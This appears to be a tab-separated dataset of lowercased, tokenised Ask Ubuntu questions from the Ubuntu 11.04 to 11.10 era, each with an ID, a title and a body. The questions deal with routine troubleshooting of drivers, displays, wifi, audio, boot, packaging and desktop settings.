95422	program to view multiple images as a multi page document	i 'd like to view multiple jpeg images ( scans ) like a pdf . if i open one in gwenview , it displays them fitting into the screen , and i can not really scroll . if i open them in okular , it displays them just like i 'd like , but i ca n't open multiple images and that is not going to change . is there any other program out there that might âsimulateâ a multi page pdf ?
95427	boot problem with ubuntu 11.10	so , i am an ubuntu newbie , and i do n't know a thing about it . i tried to install restricted extras ( am i using it right ? ) through terminal , but it seems i failed : ) maybe because during installation the internet connection crashed ... anyway , i restarted and i got the ubuntu intro screen at the boot , and then a black screen appeared with this information : checking battery state i restarted and it showed something else , so i rebooted for 5 times . then a screen appeared *starting bluetooth *pulseaudio configured for per-user sessions saned disabled ; edit /etc/default/saned i tried this : my fresh installation does n't load . ( pulseaudio problem ) but did n't know how to save so i just skipped to update-grub , anyway nothing helped . what do i do ?
95428	battery indicator disappears and shows frequently	i have a problem with a battery ( power ) indicator in ubuntu 11.10 with gnome shell . the indicator disappears and shows every moment when the cable is pluged in . it 's ok until i want to click on weather , volume or any other `` applet '' in the panel , because if i do that at the same moment as the battery indicator dissappears , i click on a wrong applet and that 's annoying . thanks for any suggestion
95430	how many years is 11.10 supported ?	i have installed ubuntu 11.10 to my dell notebook . i am very satisfied so far . how many years will it be supported from ubuntu . or should i install long term support version ?
95435	term , xterm or uxterm ?	i 'm an average home user , but still sometimes use terminal for simple tasks . when i type `` terminal '' in unity , it offers me three choices - but what`s the difference ? i hate always choosing randomly and thinking about what i did .
95438	dvi+hdmi out , at startup only hdmi is available	i have my computer next to my hdtv . the main screen is connected via dvi while the tv is connected via hdmi . if i start the computer without the hdmi plugged in , everything is ok : i see the login screen and sound is output through analog out . but if the hdmi is plugged in before i start the computer , only the tv gets an image ( the login screen ) , the main screen is black or at some times purple , but even after login the main screen is black . also sound is still output through analog out . not sure whether it 's a hw issue , or an ubuntu issue , or a combined hardware/ubuntu compatibility issue ( sandy bridge ) . this is my setup : ubuntu 11.10 oneiric ocelot ( 64bit ) asus p8h67-m le intel core i3-2100 i do n't have any custom video settings , my main screen is recognized properly when hdmi is not plugged in at startup . cheers .
95440	how do i know whether ubuntu has in-built drivers for 82845 graphic controller and how to get it if it is n't ?	i was not sure i had right graphic driver installed as the graphic quality was not as good as that in windows . this is a screenshot of my desktop under windows . and this one is how it looks under ubuntu so i downloaded some installation packages from intel . one was a .rpm file the other was .tar.gz file . i installed the .rpm file using alien but could see no changes , the graphic quality remained the same . then i tried compiling the .tar.gz file . i extracted it and then ran the ./configure command . error- no such file or directory . when i ran the make command , error- no target specified and no makefile found . then i simply ran the sudo ./install.sh command . error- the dri drivers can not be installed without the lates kernel modules . i really want the graphics in ubuntu to look as good as that . i am not even sure whether ubuntu already has the required drivers but if it does why are the graphics so rusty , and if not why am i unable to install the drivers provided by intel ? please help . this is the link from where i downloaded the drivers . here .
95442	recommendations for small stocks indicator ?	i would like to know in one glance the value of some stocks and currencies . what kind of indicator would you advice to me ? i guess an equivalent of indicators , like a widget or whatever , should be fine too . i remember there was such a possibility on older versions of ubuntu with gnome 2 , with a notification icon .
95445	printservers compatible with ubuntu	i have an hp laserjet 1220 printer , and i am looking for a standalone wireless printserver that is compatible with ubuntu . many of the wireless printservers available from linksys require windows-only drivers to be installed on computers that will use the printserver . what are some printservers that are compatible with ubuntu , and how much do they cost ?
95447	which ubuntu version will work best with 845g motherboard ?	i have been working with ubuntu version 11.04 and i have noticed that it is a lot slower than xp . like , windows take more time to open . processes take more time to complete . even surfing the net is slower . i did some research and found out that an older version might be better than this version . also , if other linux distributions would be faster and better for my machine , please tell me which ones/ i am giving my system specs- chipset - intel brookdale-g i845gev motherboard - 01/25/2005-i845g-w627-6a69vm4yc-00 video adapter - intel ( r ) 82845g/gl/ge/pe/gv graphics controller
95449	when compiling my own kernel i end up with 6 packages , which do i need to install ?	i have compiled my own kernel and i ended up with 6 packages : linux-doc_3.2.0-030200.201201042035_all.deb linux-headers-3.2.0-030200_3.2.0-030200.201201042035_all.deb linux-headers-3.2.0-030200-i7_3.2.0-030200.201201042035_i386.deb linux-image-3.2.0-030200-i7_3.2.0-030200.201201042035_i386.deb linux-source-3.2.0_3.2.0-030200.201201042035_all.deb linux-tools-common_3.2.0-030200.201201042035_all.deb i know i have to install packages 2,3,4 but am wondering what the other 3 are for and if i also need to install them or can i just delete them because they are n't needed .
95454	wireless firmware missing !	i have installed ubuntu 11.10 on the win 7 machine for the first time . i 'm unaware of any commands . i 'm unable to connect the internet using my laptop . i have n't tried using the wired connection . it gives the error that 'wireless firmware missing ' . what should i do ?
95457	what do i need to start programming ?	i am a brand new engineering student , my teacher told us that we need to program in c++ , i am new to programming and to ubuntu , i am installing the latest version of ubuntu but i would like to know what else do i need to program in c++ , i 've been told to install kate , can you please tell me what else i need ? and where to find documentation related to programming and the programs i need ? than you very much !
95458	how do i reinstall unity ?	i tested out unity 5 , and of course , it broke things , so i tried downgrading by sudo apt-get install ppa-purge sudo ppa-purge ppa : unity-team/staging it removed unity completely . apt-get install unity seemed to work , but the login screen now offers only gnome . how do i get back to unity 4 ?
95459	ati 6470m & intel hd graphics 3000 drivers ?	i have a dell 15r 2nd gen with an ati 6470m gpu and intel hd graphics 3000 ( form the i5 processor ) . i just installed ubuntu 11.10 and ca n't get the graphics card to install . in system information it comes up as unknown . i 've heard that there currently is n't any way to switch between ati & intel graphics processors on ubuntu , i do n't know how true that is . i just want the graphics card working properly . i 've been searching a while now but no luck . any help and information will be most appreciated .
95461	my video player for flash was replaced . what player is it and how do i get rid of it ?	this is what i see instead of every flash video in the web , both in firefox and chromium . non-functional . previously i installed minitube and unity 5 , both now removed . how do i get rid of it ?
95462	how to enable window shadows ?	i am using ubuntu 11.10 unity with activated default theme ambiance . my problem here is that there are no shadows visible for any window . i tried to enable them using gconf-edit , but that did not work for me . after googling a little more , i found out , that these compiz values get overridden or are ignored by unity . so i tried to edit the file /usr/share/themes/ambiance/metacity-1/metacity-theme-1.xml , but that did not help either . any suggestions are welcome , because my desktop looks rather messy with a few windows open . it 's hard to distinguish between windows without visible shadows .
95466	are internet installations possible with ubuntu ?	many distros out there supply a internet install option where a small installation iso is downloaded and is used to prepare the system to download the rest of the necessary packages directly from the internet . this offers some small advantages compared with the standard cd install present in ubuntu . is there a way to to a internet install with ubuntu ? what would be the reasons against supplying this method ?
95472	how to shutdown oneiric ocelot in two clicks ?	are you sure you want to close all programs and shut down the computer ? when i click shut down i want to shut down ! : ) this message bugs me . how to avoid this message ? how to do that in oneiric ? ? ?
95475	i want to know which implementaion of arp is used in ubuntu 10.10 ?	also i am a techie and wan na know how to join the developer network of ubuntu ?
95481	taking screenshot with menu activated using keyboard	taking a screen shot pressing print screen key will not work if i have the application menu activated or a pop-up menu ( right-click ) . i know it s possible to do that using a delay on the screen shot application , but sometimes it would be a lot better to use a keyboard shortcut to do that . does anyone know if it is possible to take those screen shots using print screen key ( or some other shortcut ) ?
95483	is there any note taking software designed for taking notes in school ?	hey just wondering if ubuntu had some great software designed to take notes in school ? features : maybe categorize by subject or course # ? and like keywords or section titles ? i am aware i can use libreword and do headers for each section and save them to individual folders but seems like ubuntu might have something better for school .
95493	the slide show is not working in libreoffice	when i create a presentation in libreoffice and click the button for slide show , nothing happens , the screen gets sort of freezed , its frustating . besides , image viewer also works no more .
95497	is it possible to get the old software center back ?	regarding the new ubuntu software center that came with 11.10 : i hate it . i think the old one is much more functional and is prettier than the new one . is there any way to get the old software center back ?
95498	what is checkbox.log and why is it 8 gb large ?	using the program baobab , i spotted that i had a file that was gigantic : ~/.cache/checkbox/checkbox.log , 8 gb large . in the same folder , i have also a 360 mb large file called subunit.log . what is it ? why is it so large ? can i remove it or reduce its size ?
95499	portforwarding from host to guest using port 80 , but it does n't work	i installed ubuntu server inside a virtual box ( 11.04 ) , then i configured apache . inside virtual box setting , i made a port forwarding from port 80 ( host ) to 80 ( guest ) , i open my web browser on my host , and i go to http : //localhost do n't work , but if i go to http : //localhost:1080 , it work , but i did n't make a port forwarding from 1080 to 80 , i have no 1080 in my configuration , what i want to know is why it does this ? i know that port 80 wo n't work until i launch the virtualbox as root , but what i do n't know is why does it actually transform the port 80 to 1080 when it could just not work ... is there something in virtualbox that see when its not root and transform address below 1024 to something else ?
95500	problem on mounting partitions after create new account	i created a new account ( administrator ) and delete the first account . in this new account , the partitions are access denied . some error like these are occur : `` you are not owner '' `` you do n't have necessary permission to access `` software '' . '' i updated my ubuntu , two win7 and one winxp , can any one help me to solve it without risk ? thanks .
95508	3d textures on intel hd 3000 sandy bridge have erroneous rectangles in 32-bit gl/glu games ( but not 64-bit ones ) in either 32-bit or 64-bit	i am wondering if there is a way to fix the following problem with intel hd 3000 video drivers on oneiric . as can be seen from the the linked image below the problem is that in some games ( namely aquaria and myth ii soulblighter native client ) all 2d textures inside opengl ( 3d ) have visible edges around them , making typically bunch of rectangles that should not be seen otherwise ( or are not seen on other video cards ) . this is the case apparently with all textures , both those that should be transparent ( e.g . have something only in the middle but nothing around the edges ) and non-transparent . i am wondering if this is a bug , or a setting issue that i can somehow fix . since only some apps are affected by this , mainly an indie game ( aquaria ) and an older game ( myth ii ) , i am wondering if they use some older and possibly less common opengl function for displaying 2d textures inside 3d ( opengl ) context and for which current intel driver simply does not do proper texture aliasing around the edges of the texture , resulting in the said lines ... http : //i.stack.imgur.com/rvudm.jpg http : //i.stack.imgur.com/yzlam.jpg p.s . forgot to mention , this is on a new hp dm1-4050 which i is a sandy bridge chipset with an integrated intel hd 3000 inside it . the system is running oneiric with latest updates including the latest ppa intel xorg driver ( but not including any new changes to xorg or mesa ) . the problem is apparent in 2 3d games , aquaria and myth ii soulblighter , both of which are using 32-bit libs ( they are 32-bit games ) on a 64-bit system . update : after corresponding with the aquaria developer , he suggested there might be a problem with 32-bit builds of the libgl* libs for the 64-bit system ( which is what i am using ) , since both games are 32-bit apps , and so far they are the only ones to exhibit this problem ... i am waiting for the aquaria dev to supply a test release for the 64-bit systems to see if the problem will go away and if it does then , this is definitely the problem with 32-bit builds of supporting libs . if so , how could i proceed to fix this ? update 2 : i just tested the 64-bit version of aquaria and the artifacts are gone , so this is definitely problem with ia32-libs and how they provide mesa/gl libs ( i am not sure whether it is an issue of version or the way they are built or something entirely different ) . i informed the upstream maintainers of ia32-libs but have no idea where the problem lies ... update 3 : i tried ubuntu 32-bit via live cd and the same problem persists suggesting that on any version of os 32-bit mesa gl/glu libs + intel hd 3000 combo exhibit this problem but the same is absent on a 64-bit version ... what would be really helpful is if others who run 32-bit version of the os and use intel hd 3000 video card could please test the myth ii demo downloadable from the following link : tain.totalcodex.net/items/show/myth-ii-demo-linux and report whether they have any issues as well as what chipset they are using ( e.g sandy bridge is the one my laptop uses ) . as a pointer , here 's the .h file from aquaria with all opengl calls that might shed light as to where the problem might lie : hg.icculus.org/icculus/aquaria/file/tip/bbge/openglstubs.h ( my reputation limit disallows use of more than 2 links , so this one has to be entered manually into the browser )
95509	dh_auto_install not working in ppa	trying to build a package in the ppa that works in local it gives an error because it does n't find usr/include/* it seems like dh_auto_install is doing nothing while in local it 's executing the install rule in the makefile . this is the log : https : //launchpadlibrarian.net/90100079/buildlog_ubuntu-oneiric-i386.librtaudio_4.0.10-3_failedtobuild.txt.gz is there any special way of specifying the install rule for the ppa ?
95516	libjpeg.so.62 not found by starcraft 2 wine causing a failure to load ! ( patcher after install )	libjpeg.so.62 not found by starcraft 2 wine causing a failure to load ! this is on the patcher for starcraft 2 that is failing . installed all the libjpeg packages and the 62 version and the dev 's from the software center . err : wincodecs : jpegdecoder_createinstance failed reading jpeg because unable to find libjpeg.so.62
95517	how to tell the version of jetty that apt-get will install ?	is it possible to see what version of jetty will be installed on the various versions of ubuntu ? is it online somewhere ? also , is it possible to see the package so i can tweak it if required ?
95522	why does ubuntu need 2 swap partitions , can i remove one ?	i installed ubuntu 11.10 - 32bit ( with 40gb disk space ) alongside windows7 . then , i installed a ubuntu 11.10 - 64bit alongside windows , as the 32bit was installed by my mistake . i chose the recommended option of saving the files by upgrading ubuntu but this procedure failed . when i tried to reboot , the system refused to reboot . doing a clean install of 64bit ubuntu solved the problem . now , everything is good and ubuntu 64bit is installed alongside windows except that i seem to have lost some disk space . looking at the disk utility , i see that there are 2 swap partitions : /dev/sda7 /dev/sda5 going by the number , do you think , i can choose delete partition from the disk utility on sda5 ? will i be able to recover the 4.2gb space and get it to be counted into the 32gb space ( sda6 ) where this ubuntu is running ? kindly help on how to go about this , i am a newbie and i am a bit worried if i will mess up something . note : as a new user could n't attached the screenshot of the disk utility
95530	no audio on an asus g51vx	i have an asus g51vx series . i installed ubuntu on my asus and i cant get the audio to work from neither my speakers nor my headphones . new to ubuntu so i dont really know how to manually install drivers for audio . ps ; the option does n't show in the aditional drivers option in the system settings window . also i 've already tried a diferent number of combinations in the sound settings window . i have tried to manually set the parameters based on this but no luck . i used command sudo nano /etc/modprobe.d/alsa-base.conf . the alsa driver is supposed to be alc663 . thank you for your assistance in advanced .
95531	ubuntu one shows music folder , but it 's empty ?	logged on to ubuntuone and it shows in my files that the album was download and says i did it two hours ago but there is nothing in the folder . looking more closely there is a purchased music file but nothing is in it . i also noticed that the songs are stile in que and have been for over 20 hours.sync is enabled and the music folder has sync checked . looking more closely there is a purchased music file but nothing is in it . i also noticed that the songs are stile in que and have been for over 20 hours.sync is enabled and the music folder has sync checked .
95532	my numpad does not enter numbers but moves my mouse around ( like a better version of windows ' mousekeys )	this is a neat feature if my mouse decides to up and die on me but in the meantime i 'd like to be able to enter numbers without hunting and pecking again ! how can i switch this off ?
95536	why do n't most applications authenticate via gksu ?	i 've found that most of user authentication programs that used in ubuntu is not gksu , but it 's not a problem . the problem is that these programs do not lock the keyboard ( while gksu does ) . for example , the program xneur ( analog puntoswitcher ) can log keystrokes . and when i turn on this option , i found my password used to authenticate applications in this log . why is ubuntu using such an insecure method of authentication ? is there a specific reason why applications do n't use gksu to authenticate ? if so , why , if not , should n't measures be taken to ensure that applications use gksu to authenticate ?
95539	how can i launch multiple instances of totem since 11.10 ?	since ubuntu 11.10 , i ca n't use the -- no-existing-session parameter that is used to launch multiple instances of totem , because it has been removed from newest versions of totem . is there a new way to do that now ? if so , how do i do that ?
95542	something went wrong with gnome3 installation	i issued the following commands : sudo add-apt-repository ppa : gnome3-team/gnome3 sudo apt-get install gnome-shell and then i found the following change in the system : but i dont find my desktop looking like this . what has gone wrong ? please help !
95543	problems in installing flash player	i am facing problems in installing flash player . it had got the package uninstalled while removing other packages . now , whenever i am trying to install the package flashplugin-installer , i am getting the following error : e : flashplugin-installer : subprocess installed post-installation script returned error exit status 1 i have tried installing the package from adobe website , from the repository , and have also tried installing the adobe-flashplugin . i keep getting the same error every time .
95547	is it possible to change the package management system ?	i took a look at centos recently and was amazed , but i also remembered dabbling in fedora when release 16 came out and recall being horrified by the awfulness of rpm . i can not stand anything other than ubuntu 's package management system . seeing rpm again in such a good setup as centos though , got me thinking again . can you change the package management system ? or is it in the core and require rebuilding the entire os ? please do n't answer with `` you can uninstall synaptic and use usc '' , i have no in depth knowledge of package management but i 'm not on about using a different gui or something . is it possible to do the above and make rpm 's native on ubuntu or deb 's on fedora ( and i do n't need to know about alien either , which converts deb 's to rpm 's and vice versa ) .
95550	capital d key not working / producing output	for some inexplicable reason the capital d key on my ubuntu system is no longer producing output . hitting caps lock and then d produces a d. i 've tried multiple keyboards and the issue is the same . there 's nothing bound to shift+d under system > preferences > keyboard shortcuts . xev produces the following : shift + a keypress event , serial 36 , synthetic no , window 0x4c00001 , root 0x27a , subw 0x0 , time 31268952 , ( 130 , -16 ) , root : ( 1000,525 ) , state 0x10 , keycode 62 ( keysym 0xffe2 , shift_r ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false keypress event , serial 36 , synthetic no , window 0x4c00001 , root 0x27a , subw 0x0 , time 31269376 , ( 130 , -16 ) , root : ( 1000,525 ) , state 0x11 , keycode 38 ( keysym 0x41 , a ) , same_screen yes , xlookupstring gives 1 bytes : ( 41 ) `` a '' xmblookupstring gives 1 bytes : ( 41 ) `` a '' xfilterevent returns : false keyrelease event , serial 36 , synthetic no , window 0x4c00001 , root 0x27a , subw 0x0 , time 31269584 , ( 130 , -16 ) , root : ( 1000,525 ) , state 0x11 , keycode 38 ( keysym 0x41 , a ) , same_screen yes , xlookupstring gives 1 bytes : ( 41 ) `` a '' xfilterevent returns : false keyrelease event , serial 36 , synthetic no , window 0x4c00001 , root 0x27a , subw 0x0 , time 31269608 , ( 130 , -16 ) , root : ( 1000,525 ) , state 0x11 , keycode 62 ( keysym 0xffe2 , shift_r ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false shift + d keypress event , serial 36 , synthetic no , window 0x4c00001 , root 0x27a , subw 0x0 , time 31102792 , ( 115 , -13 ) , root : ( 985,528 ) , state 0x10 , keycode 62 ( keysym 0xffe2 , shift_r ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false focusout event , serial 36 , synthetic no , window 0x4c00001 , mode notifygrab , detail notifyancestor focusin event , serial 36 , synthetic no , window 0x4c00001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 36 , synthetic no , window 0x0 , keys : 2 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 keyrelease event , serial 36 , synthetic no , window 0x4c00001 , root 0x27a , subw 0x0 , time 31103104 , ( 115 , -13 ) , root : ( 985,528 ) , state 0x11 , keycode 62 ( keysym 0xffe2 , shift_r ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false
95556	banshee still works after i closed it	the problem with banshee in ubuntu . after i closed it , banshee still works . i hear sound but i can not find it using alt+tab . thanks
95558	how to change menu system and appearance , please ?	11.10 graphic menus , is there a way for users that came from 11.04 to enable classic gnome menu ? also how do i change colors of application backgrounds , menu items etc , i would like to tweak around with colors and configurations .
95559	how to get bcm4312 driver to work properly ?	i have a dell laptop on which wireless and every thing used to work perfectly.today morning i noticed the suddenly there is no wireless at all . on a working condition i used to have folllowing lspci -vnn 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) subsystem : dell wireless 1397 wlan mini-card [ 1028:000c ] flags : bus master , fast devsel , latency 0 , irq 17 memory at f69fc000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : wl kernel modules : wl , ssb and /etc/lsb-release ubuntu 11.04 64 bit module in use was wl.ko but now all of a sudden it fails to load any module for wireless.i have no idea why this happened.i am a soho user who does not have any thing other than web surfing and multimedia to do on this machine.i even booted from a live usb but still wireless here failed to work ( prior to installation same live usb was able to detect the wifi card and wireless worked with this live usb ) . the driver in use was found on the live cd at following location pool/restricted/b/bcmwl/bcmwl-kernel-source_5.100.82.38+bdcom-0ubuntu3_amd64.deb which used to show as additional drivers available for installation.now this option even does not come when i boot with this live usb.since the installation of ubuntu i have kept this live usb as a backup . can some one help here ?
95561	how do i get a tascam us-122l working ?	i have tascam us-122l since windows is really crappy with this , i decided to try linux and ubuntu to be specific.. i tried searching different forums and sites on how to make my us-122l work , but most of the link and site that teaches how to make it work are really out dated.. and i cant get myself to trust a tutorial that is published 2009 and last edited early 2010.. does anyone know how to make my tascam us122l work ? if not just give a link on how to make it work.. atleast from someone who is using and made work on theirs .
95563	microsoft intellimouse episodic pauses	i have a microsoft intellimouse connected via usb to a computer ( directly , not via hub ) currently running ubuntu 11.10 , but this problem also existed before we upgraded from 10.10 . every now and then ( apparently randomly ) the computer `` pauses '' for anything up to a few seconds . this usually occurs after a mouse movement and during the pause , the computer is completely unresponsive to mouse or keyboard . lsusb shows : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 0409:0058 nec corp. highspeed hub bus 001 device 004 : id 05e3:0605 genesys logic , inc. usb 2.0 hub [ ednet ] bus 003 device 013 : id 045e:001e microsoft corp. intellimouse explorer bus 001 device 005 : id 04a9:1097 canon , inc. pixma ip5000 bus 001 device 006 : id 0a5c:200a broadcom corp. bluetooth dongle bus 001 device 007 : id 0911:1c57 philips speech processing bus 001 device 008 : id 04a9:2219 canon , inc. canoscan 9950f so the mouse appears to be correctly identified . syslog episodically shows the following sequence : jan 15 11:48:32 kayes-computer kernel : [ 10588.512036 ] usb 3-1 : usb disconnect , device number 10 jan 15 11:48:33 kayes-computer kernel : [ 10589.248026 ] usb 3-1 : new low speed usb device number 11 using uhci_hcd jan 15 11:48:33 kayes-computer mtp-probe : checking bus 3 , device 11 : `` /sys/devices/pci0000:00/0000:00:1d.1/usb3/3-1 '' jan 15 11:48:33 kayes-computer kernel : [ 10589.448596 ] input : microsoft microsoft intellimouse速 explorer as /devices/pci0000:00/0000:00:1d.1/usb3/3-1/3-1:1.0/input/input11 jan 15 11:48:33 kayes-computer kernel : [ 10589.448706 ] generic-usb 0003:045e:001e.000b : input , hidraw0 : usb hid v1.00 mouse [ microsoft microsoft intellimouse速 explorer ] on usb-0000:00:1d.1-1/input0 jan 15 11:48:33 kayes-computer mtp-probe : bus : 3 , device : 11 was not an mtp device though i ca n't confirm if these are directly associated with the `` pauses '' . any thoughts on what might be causing this or what else i can do to diagnose the problem ?
95564	why does the default arrow cursor does not change when i change my x11 cursor theme ?	using the advance settings utility from the ubuntu software center i can change the x11 cursor theme , but the only cursor that does not change is the default arrow cursor . how can i get it to change too ?
95565	how to install ubuntu using a usb stick ?	i can not install ubuntu 11.10 from a usb stick . it does n't boot to ubuntu page for installation but remains on windows 7 . i 've downloaded the 11.10 version iso file and burnt it to a usb stick . after i inserted it , the usb stick is a symbol of ubuntu installation and i clicked wubi to try to install it . but it did n't boot to ubuntu but stayed on win 7 after restart . it occurred error and said `` windowsbackend '' object has no attribut `` cd_path '' when i chose `` help me to boot from cd '' . i thought it 's the problem of my computer model ( acer travelmate 8481 ) , but it ca n't boot on an old computer using xp as well . how can i solve this problem and install ubuntu to replace windows ?
95568	how to unmute a speaker channel ?	a few months ago , i needed to mute the left channel , and the easiest way to do it was to use the gnome-volume-control tool . it has stayed muted since . since then i 've upgraded to ubuntu 11.10 , and the gnome-volume-control tool is nowhere to be found . i 've tried : the default mixer panel alsamixer pavucontrol none of these work . what can i do ?
95573	how can i transfer files between two ubuntu computers on a lan without installing additional software ?	i know i can install samba or openssh-server to be able to share files between two ubuntu computers . is there a way to share files without installing additional packages ? i installed ubuntu on two systems on the same lan , but without internet connectivity . i found that my usual way of transferring files ( scp ) failed because openssh-server was not installed on either system . using personal file sharing was impossible without installing extra packages . i ended up using netcat to transfer , which is suboptimal and not intuitive for the average user . so i 'd like to know if anyone knows of a way to do this with out-of-the-box ubuntu installations ( or at least , with packages available in the ubuntu desktop cd ) . thanks !
95582	broadcom bcm4313 works poorly on a hp pavilion g4-1212tu	i just bought a hp pavilion g4-1212tu laptop and put ubuntu 11.10 on it . wifi works badly . it can usually connect ( though showing a lower strength level than when the laptop is in windows ) but sometimes immediately , sometimes after a while , the connection becomes so bad as to be unusable . that is , the connection strength shows the same number of bars , but tcp/ip requests seem to fail or packets lost . hp does n't seem to have any linux/ubuntu drivers for the wifi for this laptop . $ lspci -nnk | grep -i net -a2 01:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) subsystem : hewlett-packard company device [ 103c:1795 ] kernel driver in use : brcmsmac 02:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) subsystem : hewlett-packard company device [ 103c:166d ] kernel driver in use : r8169
95585	connecting to mysql in bash ( without mysql installed )	i am trying to connect to a remote mysql database in bash . on the server hosting the database i can type : mysql -u _username_ -p to connect . i would like to be able to type : mysql -h _host_ -u _username_ -p to connect from another server . i do n't have mysql installed on the client so the command is not found . is there something i can install ( apt-get preferred ) besides the entire mysql-server so i can use the mysql commands in bash ?
95589	how do i increase the touchpad sensitivity on acer aspire one 532h ?	i got a cheap netbook and put ubuntu on it without even booting into the windows it came with . i am now slightly regretting it since the trackpad is very annoying , it only registers when i press quite hard on it , and even then the motion is so slow that i must drag me poor finger 3 times to get the pointer to move up or down that tiny screen . ok. enough rant . now business : i went into the setting and increase sensitivity and acceleration to high . no difference . the behaviour did not change at all . so now my questions are : is this a hardware problem ? is there a program i can run to see what input the trackpad is receiving ? so i know if it can , in theory , read the light touch and not only the heavy , sandpaper-your-fingertips-off touch ? is there some manual setting that the system might not be setting correctly and which i could change from the terminal ?
95591	how do i configure ubuntu one on a server ?	i wish to setup ubuntu one on my 11.10 server but seems to be running into an error every time i attempt to run commands from http : //manpages.ubuntu.com/manpages/lucid/man1/u1sdtool.1.html for example when i try to run u1sdtool -- start i am met with the following error : dbus.exceptions.dbusexception : org.freedesktop.dbus.error.notsupported : unable to autolaunch a dbus-daemon without a $ display for x11 i have just installed ubuntu one and have made no changes to it thus far .
95592	does `gksudo` work for any gui program ?	i thought gksudo is what sudo is in terminal . i wanted to open scite eleveted and change some `` protected '' file , so i issue 'gksudo scite` , but nothing happens , scite is n't run at all - gksudo dialog shows , then i enter my password , but program does n't start . is there some limitation which programs can be run under gksudo , or how do i run scite elevated ?
95596	upstart not loading services	i have a machine that boots no problem but a lot of the services do not start . the run level when i login is `` n 2 '' . services can be manually started but not starting on boot . i am running 10.04.3 with all latest updates . i have found the following bug https : //bugs.launchpad.net/ubuntu/+source/ifupdown/+bug/497299 ? comments=all and nothing works there ! here is the output from initctl -- list too mountall-net stop/waiting rc stop/waiting rsyslog start/running , process 766 screen-cleanup stop/waiting tty4 start/running , process 782 udev start/running , process 386 upstart-udev-bridge start/running , process 382 ureadahead-other stop/waiting vmware-tools stop/waiting apport stop/waiting console-setup stop/waiting hwclock-save stop/waiting irqbalance stop/waiting plymouth-log stop/waiting tty5 start/running , process 786 atd start/running , process 805 plymouth stop/waiting ssh start/running , process 762 control-alt-delete stop/waiting hwclock stop/waiting module-init-tools stop/waiting cron start/running , process 803 mountall stop/waiting plymouth-stop stop/waiting rcs stop/waiting ufw start/running mounted-varrun stop/waiting rc-sysinit stop/waiting tty2 start/running , process 790 udevtrigger stop/waiting mounted-dev stop/waiting tty3 start/running , process 791 udev-finish stop/waiting hostname stop/waiting mountall-reboot stop/waiting mysql start/running , process 867 mountall-shell stop/waiting mounted-tmp stop/waiting network-interface ( lo ) start/running network-interface ( eth1 ) start/running plymouth-splash stop/waiting tty1 start/running , process 1266 udevmonitor stop/waiting dmesg stop/waiting network-interface-security ( network-interface/eth1 ) start/running network-interface-security ( network-interface/lo ) start/running network-interface-security ( networking ) start/running networking stop/waiting procps stop/waiting tty6 start/running , process 798 ureadahead stop/waiting
95600	wake on lan does n't work after a long sleep	hp p6235fr under ubuntu 11.10 : nic on motherbard . after one night in suspend mode , wol does n't wake up my pc . after a few hours , it is ok . here is the result of lspci for the nic : 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) here is the result of ethtool command : delannoy @ delannoy-vn433aa-abf-p6235fr : ~ $ sudo ethtool eth0 settings for eth0 : supported ports : [ tp mii ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/half 1000baset/full supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/half 1000baset/full advertised pause frame use : symmetric receive-only advertised auto-negotiation : yes link partner advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/half 1000baset/full link partner advertised pause frame use : symmetric link partner advertised auto-negotiation : yes speed : 1000mb/s duplex : full port : mii phyad : 0 transceiver : internal auto-negotiation : on supports wake-on : pumbg wake-on : g current message level : 0x00000033 ( 51 ) drv probe ifdown ifup link detected : yes the problem is reproducible and at each time , the nic is deactivated : the switch port is down in spite of being at 10 mb/s . if suspend period is a few hours , wol works correctly . wol is fine with windows 7 in dual boot on this machine .
95602	black screen after wakeup	hp w2207h ( hdmi screen ) , hp 6235fr under ubuntu 11.10 ( nvidia gt220 ) : after suspending for a long time , wakeup my pc with usb . boots up but black screen.no screen since start of booting . the machine seems to be hung , but it is still working ... it is just blind . suspend/resume does n't solve the problem . power on reset of screen solves the problem . problem does n't exist with windows 7 ( dual boot ) .
95603	separate home directory and system files	this is a quite tricky one , i suppose . my current system is installed on a raid 1 i created during the ubuntu installation ( i.e . /dev/md0 ) . the swap partition is also on the raid . my home directory is encrypted , the swap partition , too . now i have bought a ssd disk and would like to move the system files there for quicker startup and loading of applications . i imagine the following procedure : 1. create a normal bootable partition and a swap partition on the ssd . move the swap to the ssd ( i have found instructions on that ) . 2 . boot with a live cd and move all the system files to the ssd . 3. move the home directory stuff up one directory level and add it to /etc/fstab so that the raid is mounted as /home/ while all of that seems rather simple , i have to assume that i am unaware of a lot more problems that will come up . is this procedure the way to go ? one thing i am especially wondering about is the grub 2 configuration . will it boot if i just move the files ? furthermore , will the encrypted home directory be mounted correctly ? my alternative idea would be to move all home data to an external hard disk so that the raid partition can be reduced to a size which fits on the ssd . then i could copy essentially the whole system , move the home partition out again and copy the files back . however , this would require a lot of moving files via unencrypted devices , consuming time and making the whole encryption pointless . i would appreciate a lot if somebody could give me some advice . thank you very much !
